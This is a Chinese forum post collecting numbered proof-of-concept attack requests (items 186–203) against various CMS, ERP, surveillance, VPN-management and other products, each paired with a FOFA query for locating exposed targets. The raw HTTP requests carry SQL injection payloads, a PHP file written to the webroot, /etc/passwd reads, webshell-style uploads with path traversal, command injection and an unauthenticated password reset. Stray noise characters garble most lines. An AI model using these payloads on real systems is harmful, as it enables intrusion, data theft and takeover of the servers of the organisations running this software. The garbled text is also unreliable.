; r& k d; u) Y1 F5 SGET /index.php?s=/Admin/appsave&appid=3%27%29%3Bselect+unhex%28%273c3f706870206563686f206d643528223122293b202466696c65203d205f5f46494c455f5f3b20756e6c696e6b282466696c65293b%27%29+into+outfile+%27.%5C%5C..%5C%5C..%5C%5CWebRoot%5C%5Cplom.xgi%27%23 HTTP/1.1; q+ f9 i/ R+ U+ p3 i& v
Host: host
9 x/ y$ b( S% t. s- G, U( e' ]8 m) i" L# G) d' h( x! G
1 E9 X* U6 C$ G7 m+ B186. F-logic DataCube3 SQL注入+ e: R k1 j$ b X8 q1 ?' `
CVE-2024-31750
: a$ ]1 q: @" ~$ }. R8 CF-logic DataCube3是一款用于光伏发电系统的紧凑型终端测量系统
4 Z" Q6 K7 X3 g+ U$ E3 G: l7 t eFOFA:title=="DataCube3"' `' ]6 E, c$ s
POST /admin/pr_monitor/getting_index_data.php HTTP/1.1
& \) j; ^9 G5 eHost: your-ip& v% G4 M/ o1 k/ ~% O, e
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:124.0) Gecko/20100101 Firefox/124.0( n0 J& T" J/ L3 Z4 `
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8) d2 q$ z {+ W3 v5 g( Z, p0 z
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.26 O- y; z, F4 K' F! d/ V( q5 ]
Accept-Encoding: gzip, deflate9 w9 R" X1 Y. v, w% P' _
Connection: close
3 T9 [4 F) o6 p7 {Content-Type: application/x-www-form-urlencoded
8 U1 V: F& w" k2 x3 m" V
. ^, G5 m) V" l4 j6 t! Ireq_id=1) AND 1113=LIKE(CHAR(65,66,67,68,69,70,71),UPPER(HEX(RANDOMBLOB(500000000/2)))) AND (1450=1450
: @0 M( H* V8 E* P$ j6 ?# H" U5 W3 ~$ D5 m; w0 M5 O3 D" A; T1 C- l
" b' J) v- o) T" L0 ?7 o187. Mura CMS processAsyncObject SQL注入7 T- s* }9 a/ j; B
CVE-2024-32640! O9 R% f# L& A6 I0 G( G
FOFA:"Mura CMS"
2 ]; b& U) ~: I, d( A- L3 b4 ]POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
+ r) {; K2 }$ L; s) W9 E9 X2 C( KHost: your-ip
( L6 F0 @( c' ~3 J& l# ?5 k0 sContent-Type: application/x-www-form-urlencoded$ j! `% c. P$ X1 `5 S
2 N, l4 C0 [4 t5 U
; S3 K s2 @' g0 Y% y1 yobject=displayregion&contenthistid=x%5c' AND (SELECT 3504 FROM (SELECT(SLEEP(5)))MQYa)-- Arrv&previewid=1" |0 B1 w9 }1 R6 {6 j
+ |. Y, K2 {0 q& L3 z
# i) f6 P9 n6 f2 I' ]188. 叁体-佳会视频会议 attachment 任意文件读取
( M- Y% \; |8 I3 q6 lversion <= 3.9.7
* ~ w8 O$ U. N5 rFOFA:body="/system/get_rtc_user_defined_info?site_id"
' T0 v! O( u( ]$ ^) FGET /attachment?file=/etc/passwd HTTP/1.1
6 z, U0 C' }" r: v. }# BHost: your-ip2 Z, l3 C$ R: `
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
9 a) A, d" l" ? P0 ~7 IAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
# m2 |" ~+ J3 |Accept-Encoding: gzip, deflate% _/ m6 w3 V" V% Q6 K$ x
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8! z" X; Z+ \1 L" g) r2 q+ n: M
Connection: close
5 s5 n6 g8 t% q: ^# p) k0 [: d. U6 F
- r0 P0 r6 [; x3 _2 Z9 ^
189. 蓝网科技临床浏览系统 deleteStudy SQL注入
3 H' R; F9 r$ f8 v! M! OFOFA:app="LANWON-临床浏览系统"
: ~( P% F4 b; {: bGET /xds/deleteStudy.php?documentUniqueId=1%27;WAITFOR%20DELAY%20%270:0:5%27-- HTTP/1.1
y- o+ i& S; Z9 t( N+ `$ CHost: your-ip
3 `* Y: ^2 h) v! ?6 H" s/ RUser-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36! Q6 X7 j" _- H8 }
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
$ i4 V8 g! L$ _0 K2 A) n- oAccept-Encoding: gzip, deflate
! t7 h* t$ f% H/ BAccept-Language: zh-CN,zh;q=0.95 Y2 _" o3 R* U# g
Connection: close% }$ a' Y1 V3 N/ h* ^3 O+ |) v
' _2 ~9 y9 A0 {/ c) ~, D: I, h9 ?' l
190. 短视频矩阵营销系统 poihuoqu 任意文件读取
, X2 { W# k2 [/ p# N# c6 xFOFA:title=="短视频矩阵营销系统"+ [. V2 |5 F2 K4 G. t8 D; v
POST /index.php/admin/Userinfo/poihuoqu HTTP/2% J/ A- t' f3 L% l$ D
Host: your-ip
- _/ D! H# ]3 z0 nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
! z8 A: j' |* p: {, HAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.93 Q+ W& [6 g: u" `% Q K
Content-Type: application/x-www-form-urlencoded* v7 Q' u7 F% x7 K6 F" M6 `
Accept-Encoding: gzip, deflate
( M/ A: P \6 }8 UAccept-Language: zh-CN,zh;q=0.9
: B6 ^2 x) X7 j5 ?. q, j! j5 e* M! v6 P+ C3 e% _
poi=file:///etc/passwd1 i. r# i+ E" J A& A4 V3 T5 l3 x
9 |& g2 U* |# s
" q/ U3 C& J9 W# O& p
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入7 G7 a. s8 t* Q: ` q
FOFA:body="/CDGServer3/index.jsp"
& Z8 T* q% l9 g, q7 RPOST /CDGServer3/js/../NavigationAjax HTTP/1.1* Y# V% u( J1 T1 W7 ?6 S
Host: your-ip7 Y* E8 z5 Q# k7 q5 i. `) I$ n
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
) G- B9 V" R/ ZContent-Type: application/x-www-form-urlencoded( k+ _9 u5 _6 Z7 _; M& A
2 x+ O/ l, t! k7 y; b
command=nav&id=1'waitfor delay '0:0:5'--+&name=&openId=/ W1 ^4 F) z" W1 Z2 a$ a4 R: R5 T
7 ?8 L( e/ c2 c& o
& Y% u8 }; j3 `
192. 富通天下外贸ERP UploadEmailAttr 任意文件上传
3 E7 v& C6 {5 Y/ x3 ^FOFA:title="用户登录_富通天下外贸ERP"
; @0 b7 g' j+ U. SPOST /JoinfApp/EMail/UploadEmailAttr?name=.ashx HTTP/1.1
% G6 _) R* X/ d, j L% ^. kHost: your-ip- J: d8 `" m: T8 g. R6 ?% f( I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36! I0 p7 X+ T) \0 ~
Content-Type: application/x-www-form-urlencoded
8 y( y( f: U C
' V- E; E( v. h
" Z0 B& a5 O" U0 e4 U<% @ webhandler language="C#" class="AverageHandler" %>' i/ Z% a' u0 @
using System;- Z2 X5 f$ L2 I) ?+ U
using System.Web;
+ v( v1 o( r- d: S' a$ M8 npublic class AverageHandler : IHttpHandler
" v/ {3 a' K1 m; y5 K0 s' _) ^. _{
( O9 t/ f) @. r7 z# h. E7 z; M& w6 ypublic bool IsReusable+ j* Z# m7 @2 O$ V( Z
{ get { return true; } }" `8 E+ }# x& C7 h4 f# V; O) W9 S
public void ProcessRequest(HttpContext ctx)
{( H8 o6 a: r: L# E{. ]4 @. J( d2 ~" c. J5 I X; n
ctx.Response.Write("test");
' T* i2 p1 C! | a}! @! S# A3 W9 [# Y- K
}1 m9 R& z. X0 \
! p: K: z3 V) R2 B$ a# C8 d) }. i3 `' s9 ]% K# u3 T
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行
) u# a2 {8 E1 F+ q9 x" u: MFOFA:body="山石云鉴主机安全管理系统"
7 f: G5 d7 J) _$ Q, oGET /master/ajaxActions/getTokenAction.php HTTP/1.1+ C( p' \* h7 r; O! ~9 V; X
Host:- Z; D7 e' n/ c
Cookie: PHPSESSID=2333333333333;( y* M' A% c8 {1 u& k/ I2 r
Content-Type: application/x-www-form-urlencoded- Q- K/ _0 ?0 w; |, w J- y: N' ~
User-Agent: Mozilla/5.0
+ Z) p/ t5 t2 M
7 x! R4 L: S+ `, }' f) M2 \% ~( x d
POST /master/ajaxActions/setSystemTimeAction.php?token_csrf={{token}} HTTP/1.1- L) Z7 `% Y# ^; d8 t
Host:
L. e! y0 h4 c, L0 z/ L) v7 |User-Agent: Mozilla/5.05 e/ E& I9 v; o! n5 }8 M1 [
Accept-Encoding: gzip, deflate; }; L, A; i2 I
Accept: */*
1 t9 P) u5 l/ ]. V7 P, g' QConnection: close
0 r# L0 K+ ]2 x! \7 S* v5 [ ?Cookie: PHPSESSID=2333333333333;3 v3 a6 |: ?7 Z! l3 C* A" O
Content-Type: application/x-www-form-urlencoded: V! d z) | B
Content-Length: 84
$ t8 [! m3 \5 j9 u
& g/ ]) N* H7 zparam=os.system('echo 23333333333456 > /opt/var/majorsec/installation/master/runtime/img/config')& Q9 k$ \+ V- S6 ]( e# H7 W1 ?
- }* T! z4 C! \. M& a/ B8 t( \/ q
* |, l2 u2 B l& R* x
GET /master/img/config HTTP/1.1
" {) {$ a7 a: f; T q2 ?; w, OHost:
" m3 S5 N% ^5 m1 K; A+ q! OUser-Agent: Mozilla/5.0
: }" u/ K2 _% x8 K, S2 ?
) Y% M6 w V, u$ E% X6 A5 F
& K$ H, Q- Y" v, J! W9 U194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
) k( e. A# ^4 \% ^- `FOFA:app="FE-协作平台"访问 /servlet/uploadAttachmentServlet 有返回则漏洞存在2 d0 q* z R2 v% p! e% @) |
4 c6 j4 q9 P8 VPOST /servlet/uploadAttachmentServlet HTTP/1.1
3 }% E, d+ J9 f2 f9 z& rHost: host9 [/ l! |+ o" F
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
* [: a& X5 Q3 @# B6 a$ _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.87 Z" G! d2 p& ~' K- c
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
1 ^' s) z4 ?# E- c- e' ~Accept-Encoding: gzip, deflate! t' N. |: a2 h/ n7 Z
Connection: close
! U \, L% T$ d, c" S& s2 KContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryKNt0t4vBe8cX9rZk3 Y0 v$ T u: h- Q) X4 ^
------WebKitFormBoundaryKNt0t4vBe8cX9rZk8 ]7 M- h* h9 C5 s- i& Q
9 g# W) m3 M0 l+ } Y
Content-Disposition: form-data; name="uploadFile"; filename="../../../../../jboss/web/fe.war/hello.jsp"
5 ?0 E/ P2 {0 N( z! }& [( BContent-Type: text/plain/ L) }0 A) }, S" P4 U3 x
<% out.println("hello");%>* b# k S, C# e8 B" V
------WebKitFormBoundaryKNt0t4vBe8cX9rZk* W& r$ h( }2 e$ c. A
Content-Disposition: form-data; name="json"- c! Z2 [; U3 q1 @/ A
{"iq":{"query":{"UpdateType":"mail"}}}
) i3 [4 V" `% o: t# G# w+ h* V; `* k------WebKitFormBoundaryKNt0t4vBe8cX9rZk--6 s9 S9 @2 p- m; ?5 V" z
a8 J, ]! f# Y
$ k+ d2 {* a7 Z0 U; A195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
& i6 {, W' P- @2 |' Q$ Y/ y4 _8 }FOFA:title=="飞鱼星企业级智能上网行为管理系统
9 \, {0 A- y. ^POST /send_order.cgi?parameter=operation HTTP/1.1 K* l' p' D) e
Host: 127.0.0.16 ^4 ]' l: n: {( _4 H4 z9 o0 _( z
Pragma: no-cache
4 J% _- s( Z9 P/ f& V1 Q. j/ XCache-Control: no-cache
( C8 r6 u& \+ E5 [3 o/ n2 a& jUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.365 f8 X% [" q# |7 C: k( `) Y
Accept: */*
* z6 b) u8 A, W# d& \% H3 CAccept-Encoding: gzip, deflate! c" j' g/ y8 Z+ {* Z6 P# Y) k' V
Accept-Language: zh-CN,zh;q=0.9
9 U0 F2 H4 M1 N3 N% N2 H$ ?Connection: close, C; y2 C& _& K6 Q6 A0 w5 c8 H
Content-Type: application/x-www-form-urlencoded
8 |/ D# {$ z, T$ H9 S. BContent-Length: 68
9 k5 i/ r; Z. p* t8 U' g" q8 i) A
2 l0 W4 y! i4 Y! o, I( \) `- [2 K{"opid":"777777777777777777","name":";uname -a;echo ","type":"rest"}
1 y5 \& P1 u( X% x" f/ r" p/ v( c" y7 l7 v( l
- r- f; T7 u' Y/ ?
196. 河南省风速科技统一认证平台密码重置 V# G. X( }3 E- B
FOFA:body="/cas/themes/zbvc/js/jquery.min.js"' i+ ^( E8 x" y8 G9 H+ P# d, k6 B/ o
POST /cas/userCtl/resetPasswordBySuper HTTP/1.1
# b- O4 h; h2 v3 i2 mUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
8 q5 Q" `: R5 rContent-Type: application/json;charset=UTF-8 b8 k6 w5 t" t6 r+ V
X-Requested-With: XMLHttpRequest1 S! e, J w! B" a Q
Host:
8 J/ [+ n, E* t* o9 G- rAccept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2+ \5 k4 H& ?- K( N; G4 k: E
Content-Length: 45
* C1 H4 u0 Q$ U+ s! T3 q8 s+ b. kConnection: close* A% |1 p' l3 `/ l$ ?# N$ u) P4 w
/ t& P4 B0 `# s1 Y, ]: P{"xgh":"test","newPass":"test666","email":""}" S8 Y# v; S! n) B8 N
) i4 Y+ z3 Q# c; h/ C
0 e9 w7 L$ e q9 A# E4 ^/ L
' {' ^- E4 Y4 r0 s* i197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入 D2 H2 |/ K2 _+ n" r8 F
FOFA:app="浙大恩特客户资源管理系统"7 a8 e" @4 {# P) i5 w3 g' a
GET /entsoft/Quotegask_editAction.entweb;.js?goonumStr=1')+UNION+ALL+SELECT+111*111--+&method=goonumIsExist HTTP/1.1
! |* ~0 P6 j, S6 I5 zHost:, Q/ v, X$ O' S1 W% C
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36
4 ]1 }, B, j: n+ ~, K$ G( h, uAccept-Encoding: gzip, deflate$ }# P7 K. _. b
Connection: close
# \* J2 C" M" ^$ |5 o2 B
! k/ f E& f! g( D" w6 f' g9 s% w
( M+ s3 \- _9 k$ M m
; _( \: p) l$ m6 g) Z2 U198. 阿里云盘 WebDAV 命令注入
4 P- E* e9 k# s% s. aCVE-2024-29640
/ a' G I4 L G( i& A7 aGET /cgi-bin/luci/admin/services/aliyundrive-webdav/query?sid=%60%6c%73%20%2f%3e%2f%77%77%77%2f%61%61%61%2e%74%78%74%60%20 HTTP/1.19 \' n! | f/ `/ {
Cookie: sysauth=41273cb2cffef0bb5d0653592624cf64' ^* I$ w v# q
Accept: */*
" R. ^/ A! h: O' u& s* }9 }: G% kAccept-Encoding: gzip, deflate
; Y- n% K4 }" f% Q' kAccept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6+ v( e! w; [6 q
Connection: close- C! P& H; s( J; Y2 M" t% n7 Z
! b! w8 ]5 M7 ?+ l T/ y c/ Z4 Y% t) `
199. cockpit系统assetsmanager_upload接口 文件上传 c. ]/ D& Q. w. n3 x& f3 S, g
6 P7 G3 }& q3 \! _# m. I1.执行poc进行csrf信息获取,并获取cookie,再上传访问得到结果:
- g# w; h, p. _, x( PGET /auth/login?to=/ HTTP/1.1
$ P7 _5 ~8 b L8 k, t/ n! ~: J6 t5 c( Q- y
响应:200,返回值:csfr:"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"
' i) ~/ p% X' m/ f( }2 o& Y% a; z) z9 r+ a% `1 F
2.使用刚才上一步获取到的jwt获取cookie:
$ }' K" \) N8 R! V: T0 h1 ^# H7 k; G
POST /auth/check HTTP/1.1* S5 {( Q% F. N( e2 H% t* t; r
Content-Type: application/json
( C) C$ Y+ E9 q2 g: J0 W, d$ U7 u6 l
{"auth":{"user":"admin","password":"admin"},"csfr":"eyJ0eXAi0iJKV1QiLCJhbGci0iJIUsI1NiJ9.eyJjc2ZyIjoibG9naW4ifQ.6KvuRJo3-Dp2UouwGH9D8cmnXEL4NGNen9CX3ex86cw"}7 j0 g6 ~" ~# L' b) V- f
/ H- T0 {* @3 e0 u" [
响应:200,返回值:
8 N: u0 Y3 b- y$ Y! w) \Set-Cookie:mysession=95524f01e238bf51bb60d77ede3bea92: path=/# W/ a% n' g. S- U( F3 Z
Fofa:title="Authenticate Please!"! r. ^1 V7 F& T5 o' p
POST /assetsmanager/upload HTTP/1.1
' K7 g. m( z" e4 _; S% O7 ^* fContent-Type: multipart/form-data; boundary=---------------------------36D28FBc36bd6feE7Fb37 P8 c2 @& Y/ c. t0 I; ]7 Q7 e$ F
Cookie: mysession=95524f01e238bf51bb60d77ede3bea92
* \4 J% V+ c* v4 |* q5 {
. }) Z; S* \+ ~, B-----------------------------36D28FBc36bd6feE7Fb3
$ C. x, r" g. T6 LContent-Disposition: form-data; name="files[]"; filename="tttt.php"
k: v( K$ ~" n+ SContent-Type: text/php
. U/ R: h- t1 _9 i9 D+ ^! H4 C2 P$ q t3 i4 L' ]" j7 K+ `
<?php echo "tttt";unlink(__FILE__);?>
6 L+ w4 ?3 N- h: q-----------------------------36D28FBc36bd6feE7Fb3$ `9 \8 D* y2 j5 _
Content-Disposition: form-data; name="folder"0 ?5 S, ?6 p- Q, l( C8 V+ D
7 p% Z: y& W4 f0 _5 c-----------------------------36D28FBc36bd6feE7Fb3--7 T: i$ m4 \3 B
( T. O+ g9 B9 l) r/ X* c" b. w+ I2 H7 A& e8 e3 g
/storage/uploads/tttt.php; V$ {& ~8 u% a$ D3 I( |9 v5 {
9 x) h3 p; Q& T) Y9 f2 t% a+ Z200. SeaCMS海洋影视管理系统dmku SQL注入, X" p. b6 z1 u& f' g
FOFA:app="海洋CMS"! i; r, H/ t1 r
GET /js/player/dmplayer/dmku/?ac=del&id=(select(0)from(select(sleep(5)))v)&type=list HTTP/1.1# V; I8 A. f( k' o) L; q
Cookie: PHPSESSID=hlfl5flck9q3ng1blehhv86s4s
+ q) w9 Q) d# r: p0 |Upgrade-Insecure-Requests: 1
+ B# r, u% ^3 P+ g6 y, cCache-Control: max-age=0
3 c: P* L& B2 j; xAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.74 M) k5 _4 u' J, J1 c& D5 b
Accept-Encoding: gzip, deflate8 e9 R9 x$ a( O" m8 c, c) R" ^* m
Accept-Language: zh-CN,zh;q=0.91 z- d1 n% _ E# A6 a: N8 [
, Q# p. d( |: @/ C" V
W. Y" k. Y. ~ b; j201. 方正全媒体新闻采编系统 binary SQL注入* \+ T: N5 _; h: R' {& G
FOFA:body="/newsedit/newsedit/" || app="FOUNDER-全媒体采编系统"
y4 t4 X% j; o4 A: @POST /newsedit/newsplan/task/binary.do HTTP/1.11 l( w l; p x! h3 x+ Q
Content-Type: application/x-www-form-urlencoded
) x$ [! E2 R, z3 |# uAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
/ k3 y: X3 T9 z) y4 h0 \8 C+ aAccept-Encoding: gzip, deflate
* d/ [8 @: x- B# vAccept-Language: zh-CN,zh;q=0.9
], k# c+ x3 {5 V) eConnection: close: _- |6 g. Z' Y
# F0 m8 a" @8 ~, N, y+ s
TableName=DOM_IMAGE+where+REFID%3D-1+union+select+%271%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27%3Bselect+DOM_IMAGE+from+IMG_LARGE_PATH&FieldName=IMG_LARGE_PATH&KeyName=REFID&KeyID=18 F6 s2 H* b" D
: j: ?! Q& _/ M& a! y) z4 Q
5 P6 V J2 e- }) I7 `202. 微擎系统 AccountEdit任意文件上传6 m. B0 v6 `. Z3 R3 O' ?
FOFA:body="/Widgets/WidgetCollection/"2 M3 C- W( n, I; X. q; v
获取__VIEWSTATE和__EVENTVALIDATION值- v( I6 ~; Q. _( {& `
GET /User/AccountEdit.aspx HTTP/1.1
) g4 |7 O! T( G4 W) u6 F8 P ~) jHost: 滑板人之家
$ R7 k% x' z& e3 DUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/531.36 (KHTML, like Gecko) Chrome/83.0.4103.112 Safari/537.31! A) J( u. b+ g) B" K
Content-Length: 0
4 |* C0 `& a6 j- X& ]& t7 ~2 R" q4 f* k* ]
5 ~2 V# E# n2 ?" a替换__VIEWSTATE和__EVENTVALIDATION值
8 m% [) x0 F' L0 B; RPOST /User/AccountEdit.aspx HTTP/1.1
1 m1 }) Q9 M2 @8 IAccept-Encoding: gzip, deflate, br
( _- s1 B# N# `Content-Type: multipart/form-data;boundary=---------------------------786435874t38587593865736587346567358735687( z2 R# W3 H) \
6 V1 y8 a7 |3 u7 r4 ]0 @- c
-----------------------------786435874t38587593865736587346567358735687
9 T9 T4 a- S1 S9 k; YContent-Disposition: form-data; name="__VIEWSTATE"
# b9 I5 P. P1 w# W' @( i3 v2 G8 H
& Q/ j5 U3 C5 C( L: r+ L M2 ^6 h__VIEWSTATE
! ]3 y% `& j& }* H( Q( C-----------------------------786435874t38587593865736587346567358735687
8 E1 R' Q+ V, m" K4 E' Q: }- qContent-Disposition: form-data; name="__EVENTVALIDATION", l* v5 [, C# L- ]8 o w
6 O# ^' Z, {" W( J- {2 {
__EVENTVALIDATION
6 A: v8 f( c9 A+ S-----------------------------786435874t38587593865736587346567358735687
% v* d$ G7 h# N0 IContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$upload"; filename="1123.txt"
: P& T' b4 k3 G% Q+ o) B; PContent-Type: text/plain
, q% ]! G. P$ q
C7 n& k1 G( A$ l2 o \# QHello World!# z) H( K/ S) k8 J/ [0 ?( C+ a
-----------------------------786435874t38587593865736587346567358735687
$ V4 ]/ r5 V! \/ y5 i- T2 y. [Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$bttnUpload"
* v1 [; Q# j, o! }. m i5 R5 v5 ~5 h( b; h" a+ \4 d
上传图片
+ P; P+ ^8 ^, u( Y* z P7 n-----------------------------786435874t38587593865736587346567358735687( J( U( z! k' G. F' p
Content-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtLastName"
1 k, Y$ {/ m% g. {; }
6 ^) o6 U4 l9 z7 A3 r
8 {0 n( ] ?7 X5 ?/ c4 r$ G0 o5 p-----------------------------786435874t38587593865736587346567358735687
+ A$ q2 _+ j- cContent-Disposition: form-data; name="ctl00$MyContentPlaceHolder$ctl00$txtEmail"
' C* X/ H6 u! K8 t, S" e
2 q! |0 U$ K9 ?
5 V) L4 T" Z1 s-----------------------------786435874t38587593865736587346567358735687--* `4 G) ?+ B/ h
3 A: b3 @' G9 U& u* Y
8 c+ w8 O# p; }) ]- c/_data/Uploads/1123.txt' P7 g8 b9 N3 w. S; ^- ]" l+ r% n, M# B
& s: Q; g* c7 F/ @( {
203. 红海云EHR PtFjk 文件上传8 M* r5 X1 u1 y9 r; k' c9 e
FOFA:body="RedseaPlatform"
4 R* g, U, G7 N, Z5 xPOST /RedseaPlatform/PtFjk.mob?method=upload HTTP/1.1- K5 n8 v$ M2 E9 ?: e. |
Host: x.x.x.x
9 g i9 G3 A2 A# Y8 H+ I Z& o, bAccept-Encoding: gzip
6 q( l" S7 h1 J. } {User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15( I$ v6 ~ p4 _, \
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryt7WbDl1tXogoZys4
* E4 ?7 t. J( n. f/ L2 ] u/ rContent-Length: 210) L, j3 Q! C* h; H
- Q" V3 Y- L& }
------WebKitFormBoundaryt7WbDl1tXogoZys4
) U$ C* [1 ?( @Content-Disposition: form-data; name="fj_file"; filename="11.jsp"2 ?- t' P# G+ ^
Content-Type:image/jpeg
9 }4 x, ?3 v8 j! x2 o& D3 _+ o# }! l+ d; P
<% out.print("hello,eHR");%>% F" D3 C# D* |9 C. n* x0 A- s
------WebKitFormBoundaryt7WbDl1tXogoZys4--% ]3 w1 e3 l, s: W+ O8 z% t3 v
. O0 C7 v8 B# _/ T0 ?1 L5 q2 x $ \! F3 q# x6 h: H
2 ?1 H2 ~" g! a! N9 g3 k/ N
1 z2 P8 z5 ^# d$ G/ `7 D" ?) Q; N, {4 v# v
8 B4 q. B9 i. m# `; f2 u6 s; J( w |
发表于 2024-6-5 14:31:29
收藏
支持
反对